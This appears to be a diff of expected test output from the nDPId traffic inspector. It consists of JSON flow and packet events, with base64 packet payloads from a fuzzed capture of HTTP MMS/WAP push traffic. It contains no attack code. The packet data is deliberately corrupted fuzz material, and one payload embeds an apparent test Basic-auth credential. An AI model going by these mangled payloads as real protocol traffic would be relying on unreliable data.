-00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":109,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":33,"flow_packet_id":3,"flow_last_seen":1031854562490,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1031854562490,"pkt":"CAAgsl17AFCLk5N8CABFAAAoREtAAIAGWEqsFAMFrBQDDQBQz5DlW6AhyuQuqFAQHdzk2gAAAgQFtG4v"} -00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":114,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854562690,"flow_last_seen":1031854562690,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1031854562690,"l3_proto":"ip4","src_ip":"172.20.67.13","dst_ip":"172.20.3.5","src_port":53136,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":114,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":35,"flow_packet_id":1,"flow_last_seen":1031854562690,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1031854562690,"pkt":"AFCLk5N8CAAgsl17CABFAAAobNpAAEAGF7usFEMNrBQDBc+QAFDK5C6o5VOhNFAQgyx+pAAA"} +00598{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":92,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854557975,"flow_last_seen":1031854557975,"flow_idle_time":7560000,"flow_min_l4_payload_len":1460,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":1460,"flow_avg_l4_payload_len":1460,"midstream":1,"thread_ts_msec":1031854557975,"l3_proto":"ip4","src_ip":"172.20.3.13","dst_ip":"172.20.72.5","src_port":80,"dst_port":2606,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +02421{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":92,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":27,"flow_packet_id":1,"flow_last_seen":1031854557975,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":1514,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1514,"pkt_l4_len":1480,"thread_ts_msec":1031854557975,"pkt":"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"} +00913{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":93,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1031854557802,"flow_last_seen":1031854557975,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":3279,"flow_avg_l4_payload_len":468,"midstream":0,"thread_ts_msec":1031854557975,"l3_proto":"ip4","src_ip":"172.20.3.5","dst_ip":"172.20.3.13","src_port":2606,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"172.20.3.13","url":"172.20.3.13\/servlets\/mms?message-id=189301","code":0,"content_type":"","user_agent":""}} +00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":97,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854562320,"flow_last_seen":1031854562320,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1031854562320,"l3_proto":"ip4","src_ip":"172.20.3.5","dst_ip":"172.20.3.13","src_port":2607,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":97,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":28,"flow_packet_id":1,"flow_last_seen":1031854562320,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":24,"thread_ts_msec":1031854562320,"pkt":"CAAgsl1rAFCLk5N8CABFAAAsPltAAIAGXkasFAMFrBQDDQovAFDlUj+sAAAAAGACIADqbQAAAgQFtAAA"} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":98,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":28,"flow_packet_id":2,"flow_last_seen":1031854562321,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1031854562321,"pkt":"AFCLk5N8CAAgsl17CABFAAAsxNJAAEAGF7+sFAMNrBQDBQBQCi\/K2yc15VI\/rWASgyyVHwAAAgQFtA=="} +00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":99,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":28,"flow_packet_id":3,"flow_last_seen":1031854562321,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1031854562321,"pkt":"CAAgsl17AFCLk5N8CABFIAAoP0tAAIAGXUqsFAMFrBQDDQovAFDlUj+tytsnNlAQIjgN0QAAAgQFtAAA"} +00598{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":100,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854562321,"flow_last_seen":1031854562321,"flow_idle_time":7560000,"flow_min_l4_payload_len":1460,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":1460,"flow_avg_l4_payload_len":1460,"midstream":1,"thread_ts_msec":1031854562321,"l3_proto":"ip4","src_ip":"172.20.3.5","dst_ip":"172.20.3.13","src_port":9587,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +02421{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":100,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":29,"flow_packet_id":1,"flow_last_seen":1031854562321,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":1514,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1514,"pkt_l4_len":1480,"thread_ts_msec":1031854562321,"pkt":"CAAgsl17ACVzAJN8CABFAAXcQEtAAIAGVpasFAMFrBQDDSVzAFDlUj+tytsnNlAQInStCAAAUE9TVCAvc2VydmxldHMvbW1zIEhUVFAvES4xDQpIbnN0OiAxNzIuMjAuMy4xMw0KT3B0OiAiaHR0cDovL3d3dy53My5vcmcvMTk5OS8wNi8yNC1DQ1BQZXhjaGFuZ2UiOyBucz01Ng0KQ29sdGVudC1UeXBlOiBhcHBsaWNhdGlvbi92bmQud2FwLm1tcy1tZXNzYWdlDQpBY2NlcHQ6INtwcGxpY2F0aW9uL3ZuZC53YXAubW1zLW1lc3NhZ2UNCkNhY2hlLUNvbnRyb2w6IG5vLWNhY2hlDQpBY2NlcHQtTGFuZ3VhZ2U6IGVuDQpVc2VyLEFnZW50OiBTb255RXJpY3Nzb25UNjgvUjIwMUENCEFjY2VwdC1DaGFyc2V0OiAqDQo1Ni1Qcm9maWxlLURpZmYtMTogPD94bWwgdmVyc2lvbj0lcwAwIj8+PHpkZjpSREYgeG1sbnM6cmRmPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5LzAyLzIyLXJkZi1zeW50YSVzAHMjInhtbG5zOnByZj0iaHR0cDovL3d3VC53YXBmb291bS5vcmcvVUFQbk9GL2NjcHBzY2hlbWEtMTk5OTEwMTQjIj48IS0tIGJyb3dzZXIgdmVuZG9yIHNpdGU6IERlZmF1bHQgZGVzY3JpcHRpb34gb2YgcHJvcGVydGllcyAtLT48cmRmOkRlc2NyaXB0aW9uPjxwcmY6Q2NwcEFjY2VwdD48cmRmOkJhZz48cmRmOmxpPmFwcGxpY2F0aW9uL3ZuZC53YXAubW1zLW1lc3NhZ2U8L3JkZjpsaT48L3JkRzpCYWc+PC9wcmY6Q2NwcEFjY2VwdD5XL3JkZjpEZXNjcmlwdGlvbj48L3JkZjpSREY+DQo1Ni1Qcm9maWxlLURpZmYtMjogPD94bWwgdmVyc2lvbj0iMS4wIj8+PHJkZjpSREYgcG18bnM6cmRmPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5LzAyLzIyLXJkZi1zeW50YXgtbnMjInhtbLVzOnByZj0iaHR0cDovL3d3dy53YXBmb3J1bS5vcmcvVUFQUk9GL2NjcHBzY2hlbWEtMTk5OTEwMDQjIj48IS0tIGJyb3dzZXIgdmVuZG9yIHNpdGU6IERlZmF1bHQgZGVzY3JpcHRpb24gb2YgcHJvcGVydGllcyAtLT58ckhmOkRlc2NyaXB0aW9uPjxwcmY6Q2NwcEFjY2VwdC1DaGFyc2V0PjxyZGY6QmFnPjxyZGY6bGk+KjwvcmRmOmxpPjwvcmRmOkJhZz48L3ByZjpDY3BwQWNjZXB0LUNoYXJzZXQ+PC9yZGY6RGVzY3JpcHRpb24+PC9yZGY6UkRGPg0KNTYtUHJvZmlsZS1EaWZmLTM6IDw\/eG1sIHZlcnNpb249IjEuMCI\/PjxyZGY6UkRGIHhtbG5zOnJkZj1MaHR0cDovL3d3dy53My5vcmcvMTk5OS8wMi8yMi1yZGYtc3ludGF4LW5zIyJ4bWxuczpwcmY9Imh0dHA6L9x3d3cud2FwZm9CdW0ub3JnL1VBUFJPRi9jY3Bwc2NoZW1hLTE5OTkxMDE0IyI+PCEtLSBicm93c2VyIHZlbmRvciBzaXRlOiBEZWZhdWx0IGRlc2NyaXB0aW9uIG9mIHByb3BlcnRpZXMxLS0+PHJkZk5EZXNjcmlwdGlvbj48cHJmOkNjcHBB9mNlcHQtTGFuZ3VhZ2U+PHJkZjpTZXE+PHJkZjpsaT5lbjwvcmRiOmxpPjwvcmRmOlNlcT48L3ByZjpDY3BwQWNjZXB0LUxhbmd1YWdlPjwvcmRmOkRlc2NyaXB0OG9uPjwvcmRmOlJERj4NCjU2LVByb2ZpbGUJICJodHRwOi8vd2FwLnNvbnllcmljc3Nvbm1vYmlsZS5jb20vVUFwcm9mL1Q2OFI="} +00664{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":100,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854562321,"flow_last_seen":1031854562321,"flow_idle_time":7560000,"flow_min_l4_payload_len":1460,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":1460,"flow_avg_l4_payload_len":1460,"midstream":1,"thread_ts_msec":1031854562321,"l3_proto":"ip4","src_ip":"172.20.3.5","dst_ip":"172.20.3.13","src_port":9587,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":103,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854562401,"flow_last_seen":1031854562401,"flow_idle_time":7560000,"flow_min_l4_payload_len":19,"flow_max_l4_payload_len":19,"flow_tot_l4_payload_len":19,"flow_avg_l4_payload_len":19,"midstream":1,"thread_ts_msec":1031854562401,"l3_proto":"ip4","src_ip":"172.20.2.13","dst_ip":"172.20.3.5","src_port":80,"dst_port":2607,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00661{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":103,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":30,"flow_packet_id":1,"flow_last_seen":1031854562401,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":197,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":197,"pkt_l4_len":39,"thread_ts_msec":1031854562401,"pkt":"AFCLk5N8CAAgsl17CABFAAA7xNRAAEAGFzKsFAINrBQDBQBQCi\/K2yc25VJHCFAYgyz\/yAAASFRUUC8xLjEgMjAwIE9LDQpTZXN2ZXI6IFJlc2luLzIuMC4xDQpDb250ZW50LVR5cGU6IGFwcGxpY2F0eW9uL3ZuZC53YXAubW1zLW1lc3NhZ2UNCnRvbnRlbnQtTGVuZ3RoOiAwDQpEYXRlOiBUaHUsIDEyIFNlcCAyMDAyIDE4OjE2OjAyIEdNVA0KDQo="} +00587{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":104,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854562488,"flow_last_seen":1031854562488,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1031854562488,"l3_proto":"ip4","src_ip":"172.20.3.13","dst_ip":"172.20.3.5","src_port":53193,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":104,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":31,"flow_packet_id":1,"flow_last_seen":1031854562488,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1031854562488,"pkt":"AHWLk5N8CAAgsl17CABFAAAwxNVAAEAGF7isFAMNrBQDBc\/JAFDK5CpLAAAAAHACgyzcpwAAAQEEAgIEBbQ="} +00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":105,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854562488,"flow_last_seen":1031854562488,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1031854562488,"l3_proto":"ip4","src_ip":"172.20.3.5","dst_ip":"172.20.35.13","src_port":80,"dst_port":53136,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":105,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":32,"flow_packet_id":1,"flow_last_seen":1031854562488,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":24,"thread_ts_msec":1031854562488,"pkt":"CAAgsl17AFCLk5N8CABFAAAsQ0tAAIAGWUasFAMFrBQjDQBQz5DlU6AgyuQqTGASIjjNHQAAAgQFtG4v"} +00587{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":106,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854562488,"flow_last_seen":1031854562488,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1031854562488,"l3_proto":"ip4","src_ip":"172.20.3.13","dst_ip":"172.20.3.5","src_port":53136,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":106,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":33,"flow_packet_id":1,"flow_last_seen":1031854562488,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1031854562488,"pkt":"AFCLk5N8CAAgsl17CABFAAAoxNZAAEAGF7+sFAMNrBQDBc+QAFDK5CpM5VPMIVAQgyyD5gAA"} +00892{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":107,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":33,"flow_packet_id":2,"flow_last_seen":1031854562489,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":370,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":370,"pkt_l4_len":336,"thread_ts_msec":1031854562489,"pkt":"AFCLkxN8CAAgsl17CABFAAFkZddAAEAGFoKsFAMNrBQDBc+QAFDK5CpN5VOgIVAYgyyj7gAAUE9TVCAvcHBnY3RybC9wcGdjb24lcwBsbG9naWMuZGxsIEhUVFAvZC4xDQpBdXRob3JpemF0aXhuOiBCYXNpYyBiRzFqWDNjNlZHVnpkREV5TXpRPQ0KQ29udGVudC1UeXBlOiBtdWx0aXBhcnQvcmVsYXRlZDsgYm91bmRhcnk9Im1zZyVzAHRfMF8xMDM4XzEwMzE4NTQ1NjI0ODQiOyB0eXBlPSJhcHBsaWNhdGlvTi94bWwiDQpVc2VyLUFnZW50OiBNTVMtUmVsYXktRGVsaXZlcnlJbml0aWF0b3INCkFjY2VwdDogYXBwbGljYXRpb24veG1sDQpDb25uZWN0aW9uOiVzAGVwLWFsaXZlDQpIb3N0OiAxNzIuMjAuMy41DQpDb250ZW50LWxlbmd0aDogODAwDQoNGg=="} +00659{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":107,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1031854562488,"flow_last_seen":1031854562489,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":316,"flow_tot_l4_payload_len":316,"flow_avg_l4_payload_len":158,"midstream":1,"thread_ts_msec":1031854562489,"l3_proto":"ip4","src_ip":"172.20.3.13","dst_ip":"172.20.3.5","src_port":53136,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00595{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":108,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854562489,"flow_last_seen":1031854562489,"flow_idle_time":7560000,"flow_min_l4_payload_len":800,"flow_max_l4_payload_len":800,"flow_tot_l4_payload_len":800,"flow_avg_l4_payload_len":800,"midstream":1,"thread_ts_msec":1031854562489,"l3_proto":"ip4","src_ip":"172.20.3.13","dst_ip":"172.70.3.5","src_port":53136,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +01536{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":108,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":34,"flow_packet_id":1,"flow_last_seen":1031854562489,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":854,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":854,"pkt_l4_len":820,"thread_ts_msec":1031854562489,"pkt":"AFCLk5N8CAAgsl17CABFAANIxNhAAEAGFJ2sFAMNrEYDBc+QAFDK5CuI5VOgYVAYgyy9cwAALS1tc2dwYXJ0XzBfMTAzOF8xMDMxODU0NTYyNDg0DQpDb250s250LVR5cGU6IGFwcGxpY2F0em9uk3htbA0KDQo8P3htbCB2ZXJzaW9uPSIxLjAiPz4NCjwhRE9DVFlQRSBwYXAgUFVCTElDICItLy9XQVBGT1JVTS8vRFREIFBBUCAxLjAvL0VOIg0KICAgICAgICAgNmh0dHA6Ly93d3cud2FwZm9ydW0ub3JnL0RURC9wYXBfMS4wLmR0ZCI+DQo8cCBwPg0KICA8cHVzaC1tZXNzYWdlIHB1dmgtaWQ9IjE4OTMwMV8xMDMxODU0NTYyNDgyXzEwMzhAZ2VjZHMyLm1vYmlsaXR5bGFiLm5lWSIgZGVsaXZlci1iZWZvcmUtdGltZXN0YW1wPSIyMDAyLTA5LTEyVDE5OjE0OjQ4SiIgcHBnLW5vdGlmeS1yZXF1ZXN0ZWQtdG89Imh0dHA6Ly8xNzIuMjAuMy4xMytzZXJ2bGV0cy9tbXMiPg0KICAgITxhZGRyZXNzIGFkZHJlc3MtdmFsdWU9IldBUFBVU0g9KzQ5MTcwNjEwMTAwNC9UWVBFPVBMTU5AMTcyLjIwLjMuNSI+PC9hZGRyZXNzPg0KIDIgIDxxdWFsaXR5LW9mLXNlcnZpY2UgcHJpb3JpdHk9Im1lZGl1bSIgZGVsaXZlcnktbWV0aG9kPSJ1bmNvbmZpcm1lZCI+PC9xdWFsaXR5LW9mLSVzAHZpY2U+DQogIDwvdnVzaC1tZXNzYWdlPg0KPC9wYXA+DQoNCi0tbXNncGFydF8wXzEwWDhfMTAzMTg1NDU2MjQ4NA0KQ29udGVudC1UeXBlOiBjcHBsaVdhdGlvbi92bmQud2FwLm1tcy1tZXNzYWdlDQpYLWphcC1BcHBsaWNhdGlvbi1JZDogNA0KDR+Mho2QizE4OTMwMEBnZWNkczIubW9iaWxpdHlsYWIubmV0AJcrNDkxNzI2MTAxMDA0L1RZUEU9UExNTleFBD2A2eKVgQ0KLS1tc2dnYXJ0XzBfMTAzOF8xMDMxODU0NTYyNDg0LS0="} +00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":109,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":33,"flow_packet_id":3,"flow_last_seen":1031854562490,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1031854562490,"pkt":"CAAgsl17AFCLk5N8CABFAAAoREtAAIAGWEqsFAMFrBQDDQBQz5DlW6AhyuQuqFAQHdzk2gAAAgQFtG4v"} +00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":114,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854562690,"flow_last_seen":1031854562690,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1031854562690,"l3_proto":"ip4","src_ip":"172.20.67.13","dst_ip":"172.20.3.5","src_port":53136,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":114,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":35,"flow_packet_id":1,"flow_last_seen":1031854562690,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1031854562690,"pkt":"AFCLk5N8CAAgsl17CABFAAAobNpAAEAGF7usFEMNrBQDBc+QAFDK5C6o5VOhNFAQgyx+pAAA"} 00199{"error_event_id":5,"error_event_name":"Unknown packet type","datalink":1,"packet_id":117,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","layer_type":3072,"global_ts_msec":1031854565447} 00364{"packet_event_id":1,"packet_event_name":"packet","packet_id":117,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":3072,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":1031854562790,"pkt":"CAAgsl17AFCLk5N8DABFJXMATUtAAIAGT0asFAMFrBQDDQowAFDlXnSjAABhAGACIAC1aQAAAgQFtCiq"} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":118,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854565447,"flow_last_seen":1031854565447,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1031854565447,"l3_proto":"ip4","src_ip":"172.20.3.13","dst_ip":"172.20.3.5","src_port":80,"dst_port":2608,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 